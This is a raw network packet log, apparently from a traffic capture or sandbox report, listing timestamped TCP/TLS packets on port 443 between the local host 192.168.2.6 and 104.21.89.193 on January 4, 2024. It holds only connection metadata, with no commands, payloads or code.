                                                                                    Jan 4, 2024 08:30:02.071521997 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.071528912 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.071604013 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.073074102 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.073090076 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.073141098 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.073149920 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.073190928 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.074950933 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.074981928 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.075001001 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.075007915 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.075033903 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.075053930 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.075505018 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.075558901 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.075565100 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.123245955 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.180936098 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.180984020 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.180994034 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.181065083 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.181076050 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.181101084 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.182481050 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.182497978 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.182574034 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.182583094 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.184273005 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.184297085 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.184343100 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.184357882 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.184370995 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.184412956 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.185081005 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.185143948 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.185487032 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.185539961 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.187096119 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.187124014 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.187154055 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.187175989 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.187186956 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.187239885 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.187241077 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.187252045 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.187297106 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.187942982 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.188087940 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.189877033 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.189937115 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.189943075 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.189950943 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.190017939 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.191620111 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.191648006 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.191693068 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.191700935 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.191711903 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.193471909 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.193497896 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.193567991 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.193577051 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.195255995 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.195270061 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.195321083 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.195332050 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.196641922 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.196661949 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.196729898 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.196729898 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.196738958 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.198470116 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.198482990 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.198545933 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.198563099 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.200176001 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.200196981 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.200220108 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.200237989 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.200248003 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.202011108 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.202034950 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.202090025 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.202090025 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.202100039 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.203331947 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.203351974 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.203385115 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.203412056 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.203423023 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.205243111 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.205256939 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.205307007 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.205315113 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.207035065 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.207063913 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.207093954 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.207103014 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.207139969 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.208813906 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.208833933 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.208875895 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.208893061 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.210016012 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.210035086 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.210072994 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.210088015 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.210100889 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.211810112 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.211827040 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.211873055 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.211882114 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.211915016 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.213671923 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.213690996 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.213736057 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.213749886 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.213766098 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.215672016 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.215686083 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.215742111 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.215749979 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.215775967 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.217390060 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.217423916 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.217451096 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.217463017 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.217479944 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.218780994 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.218796015 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.218843937 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.218863010 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.218872070 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.220659971 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.220679045 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.220736980 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.220747948 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.222426891 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.222441912 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.222502947 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.222516060 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.224220037 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.224240065 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.224284887 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.224293947 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.224337101 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.225672960 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.225687981 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.225753069 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.225753069 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.225766897 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.275965929 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.275989056 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.276046991 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.276057959 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.276099920 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.276674032 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.276746035 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.276762962 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.276889086 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.308346033 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.308408976 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.310573101 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.310587883 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.310653925 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.310664892 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.311465979 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.311530113 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.311551094 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.312022924 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.312084913 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.312093019 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.312150002 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.313438892 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.313453913 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.313507080 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.313518047 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.313571930 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.319622040 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.319658041 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.319699049 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.319708109 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.319761992 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.320795059 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.320830107 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.320877075 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.320877075 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.320889950 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.321727037 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.321743011 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.321784019 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.321791887 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.321831942 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.322647095 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.322663069 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.322710037 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.322724104 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.322766066 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.323533058 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.323591948 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.324826956 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.324841976 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.324887037 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.324894905 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.325814009 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.325846910 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.325881958 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.325881958 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.325891018 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.325902939 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.326075077 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.326127052 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.326134920 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.326191902 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.327189922 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.327234030 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.327275038 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.327275038 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.327285051 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.327323914 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.328079939 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.328107119 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.328147888 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.328157902 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.328176975 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.328193903 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.328862906 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.328879118 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.328948975 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.328962088 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.328994989 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.329303980 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.329411030 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.329418898 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.330359936 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.330398083 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.330440044 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.330440044 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.330451012 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.330502033 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.332178116 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.332206964 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.332245111 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.332259893 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.332261086 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.332305908 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.332869053 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.332928896 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.334631920 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.334646940 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.334707975 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.334716082 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.334763050 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.335897923 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.335911989 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.335952044 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.335968018 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.336013079 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.337850094 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.337871075 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.337925911 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.337925911 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.337946892 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.337994099 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.339679956 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.339704990 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.339782953 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.339792967 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.339868069 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.341438055 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.341453075 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.341504097 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.341523886 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.341567993 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.342722893 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.342737913 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.342791080 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.342801094 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.342875004 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.344522953 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.344542980 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.344589949 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.344599962 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.344655037 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.346529961 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.346544981 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.346610069 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.346617937 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.346662045 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.348287106 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.348305941 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.348361015 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.348373890 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.348416090 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.350092888 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.350114107 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.350162983 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.350168943 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.350204945 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.350204945 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.351414919 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.351442099 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.351486921 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.351486921 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.351495981 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.351535082 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.353100061 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.353115082 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.353183985 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.353192091 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.353241920 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.355102062 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.355118036 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.355154991 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.355165958 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.355181932 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.355216026 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.356015921 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.356081009 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.356089115 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.356102943 CET44349717104.21.89.193192.168.2.6
                                                                                    Jan 4, 2024 08:30:02.356163025 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.356539965 CET49717443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.390631914 CET49719443192.168.2.6104.21.89.193
                                                                                    Jan 4, 2024 08:30:02.390667915 CET44349719104.21.89.193192.168.2.6
